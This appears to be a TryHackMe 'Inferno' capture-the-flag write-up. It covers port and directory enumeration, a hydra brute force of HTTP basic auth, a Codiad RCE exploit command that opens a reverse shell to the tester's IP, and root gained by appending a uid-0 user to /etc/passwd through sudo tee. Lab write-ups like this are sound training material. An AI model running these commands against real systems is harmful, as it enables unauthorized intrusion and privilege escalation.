Inferno — TryHackMe
Write-up for TrayHackMe’s room named Inferno:-Real Life machine vs CTF. The machine is designed to be real-life and is perfect for newbies starting out in penetration testing. This room can be found here:
This is straight boot2root box where we need to find user and root flags.So let’s jump right in to enumeration with nmap.
Run a simple nmap scan to check what is running on this box.
kali@kali:/tmp$ nmap -sC -sV 10.10.246.58
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 13:15 EST
Nmap scan report for 10.10.246.58
Host is up (0.083s latency).
Not shown: 967 closed ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA)
| 256 de:4f:ee:fa:86:2e:fb:bd:4c:dc:f9:67:73:02:84:34 (ECDSA)
|_ 256 e2:6d:8d:e1:a8:d0:bd:97:cb:9a:bc:03:c3:f8:d8:85 (ED25519)
23/tcp open tcpwrapped
25/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
88/tcp open tcpwrapped
106/tcp open pop3pw?
110/tcp open tcpwrapped
389/tcp open tcpwrapped
464/tcp open tcpwrapped
636/tcp open tcpwrapped
777/tcp open tcpwrapped
783/tcp open tcpwrapped
808/tcp open ccproxy-http?
873/tcp open tcpwrapped
1001/tcp open tcpwrapped
1236/tcp open tcpwrapped
1300/tcp open tcpwrapped
2000/tcp open tcpwrapped
2003/tcp open tcpwrapped
2121/tcp open tcpwrapped
2601/tcp open tcpwrapped
2602/tcp open tcpwrapped
2604/tcp open tcpwrapped
2605/tcp open tcpwrapped
2607/tcp open tcpwrapped
2608/tcp open tcpwrapped
4224/tcp open tcpwrapped
5051/tcp open tcpwrapped
5432/tcp open tcpwrapped
5555/tcp open tcpwrapped
5666/tcp open tcpwrapped
6346/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.98 seconds
A lot! May be this is to throw us off.So lets concentrate on Port 80 first and we see a simple page.We can brute force this web page to find other directories which might be available.We will use ffuf to do this.
└─$ ffuf -u http://10.10.121.4/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL : http://10.10.121.4/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
inferno [Status: 401, Size: 458, Words: 42, Lines: 15]
[Status: 200, Size: 638, Words: 63, Lines: 37]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [220546/220546] :: Job [1/1] :: 419 req/sec :: Duration: [0:08:46] :: Errors: 0 ::
Exploring /inferno, we get a login prompt:
Trying few combination and intercepting the request in Burp we can see that it is a Simple Basic HTTP Authentication, which we can brute force using hydra.
Tried brute-forcing with few username like:- infreno,dante,admin.Finally got a password for username — admin.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.121.4 -m /inferno http-get
Using above credentials,we get another login form,again we can try logging in with the same credentials:
We are able to login and can see some kind of code repository or IDE:
Searching for “Codiad” on the inter web found that it is a web-based IDE framework and also found a RCE for that at:
Now running the exploit as given was always failing with 401 Not Authorized error.
Well we saw earlier that we had to login twice,so our script should run with the following parameters to run the exploit:
python3 exploit.py http://admin:XXXX@10.10.153.226/inferno/ admin XXXX 10.8.98.192 9999 linux
Where XXXX is the password found by hydra. Refer this link for the explanation:
Let’s run the script and follow what is asked for i.e. starting the netcat sessions and after sometime we will get our reverse shell:
You might notice that we are getting kicked out of our reverse shell periodically.Seems to be some kind of script running on the target which is doing it. Needed to run the exploit few time and explored /home directory and finally found a file named .download.dat under /home/dante/Downloads/ as we had permission’s to read dante’s home directory. Converted the hex content of download.dat to ASCII, which gave us credentials for dante’s user.
These turned out to be SSH credentials of dante’s user, so logged in and got the local.txt:
First check what we can run as sudo with “dante” user:
So using sudo we can write to any file, why not write to /etc/passwd file with a new user named “newroot” with user id 0. Read here for more privilege escalations like this:
openssl passwd -1 -salt newroot Password123
echo “newroot:\$1\$newroot\$6nAEFPEggbiFPRUX2BuQa/:0:0:root:/root:/bin/bash” | sudo tee -a /etc/passwd
We have rooted Inferno and got our proof.txt.
Now if you are wondering how we were kicked out of our sessions all along,used pspy to spy on the process running on the target and noticed that a shell script “/var/www/html/machine_services1320.sh” is running every minute:
Here is what this script looks like:
Ah, the first command is killing the Bash Shell that is why we are getting kicked out. Rest of the command are dummy Netcat sessions and that’s why we saw so many open ports during our NMAP scan. Sweet. Last point is from where this cron job is running as didn’t see any entry in /etc/crontab,/etc/cron.d, so search around and found this job in here:
Thanks for reading this. See you in another write up.